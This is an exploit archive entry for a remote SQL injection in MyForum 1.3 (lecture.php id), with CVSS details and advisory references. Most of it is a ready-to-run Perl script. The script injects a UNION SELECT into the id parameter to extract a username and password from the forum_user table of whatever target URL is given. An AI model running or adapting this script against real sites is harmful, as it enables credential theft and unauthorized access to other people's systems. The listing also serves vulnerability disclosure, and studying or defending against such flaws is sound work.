MyForum 1.3 (lecture.php id) Remote SQL Injection Exploit

2008.10.29
Credit: Vrs-hCk
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl #***********************************************************************************# # Remote SQL Injection Exploit # #***********************************************************************************# # Software : MyForum 1.3 # # Download : http://www.easy-script.com/scripts-dl/myforumv1.3.zip # # Date : 27 October 2008 # Author : Vrs-hCk # # Contact : d00r[at]telkom[dot]net # #***********************************************************************************# # Greetz # #***********************************************************************************# # MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org # # Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem, # # loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang, # # chawanua, bL4Ck_3n91n3, R3V4N_B4ST4RD, bryan_ae1, dkk ... c0li.m0de.0n !!! # #***********************************************************************************# use HTTP::Request; use LWP::UserAgent; $bug = "lecture.php?id=1"; $sql = "+union+select+1,concat(0x21,pseudo,0x3a,mdp,0x21),3,4,5,6,7,8+from+forum_user+where+id=1--"; print "\n ******************************************\n"; print " * MyForum 1.3 Remote SQL Exploit *\n"; print " * For get Admin or User Login *\n"; print " * Coded by Vrs-hCk *\n"; print " ******************************************\n\n"; if (@ARGV != 1) { &help; exit(); } sub help(){ print " [?] Use : perl $0 www.target.com\n"; print " perl $0 www.target.com/path\n\n"; } if ($ARGV[0] =~ /http:\/\// ) { $target = $ARGV[0]."/"; } else { $target = "http://".$ARGV[0]."/"; } print " [SQL] Exploiting ...\n\n"; my $injection = $target.$bug.$sql; my $request = HTTP::Request->new(GET=>$injection); my $useragent = LWP::UserAgent->new(); $useragent->timeout(10); my $response = $useragent->request($request); if ($response->is_success) { my $res = $response->content; if ($res =~ m/!(.*):(.*)!/g) { my ($username,$passwd) = ($1,$2); print " [target] $target \n"; print " [loginx] $username:$passwd \n\n"; } else { print " [SQL] Error, Fail to get admin login.\n\n"; } } else { print " [SQL] Error, ".$response->status_line."\n\n"; }

References:

http://www.securityfocus.com/bid/31926
http://www.milw0rm.com/exploits/6844


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top